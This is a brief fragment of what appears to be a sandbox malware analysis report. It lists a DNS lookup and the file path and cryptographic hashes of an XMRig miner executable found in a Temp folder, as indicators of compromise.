| US | 8.8.8.8:53 | 174.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |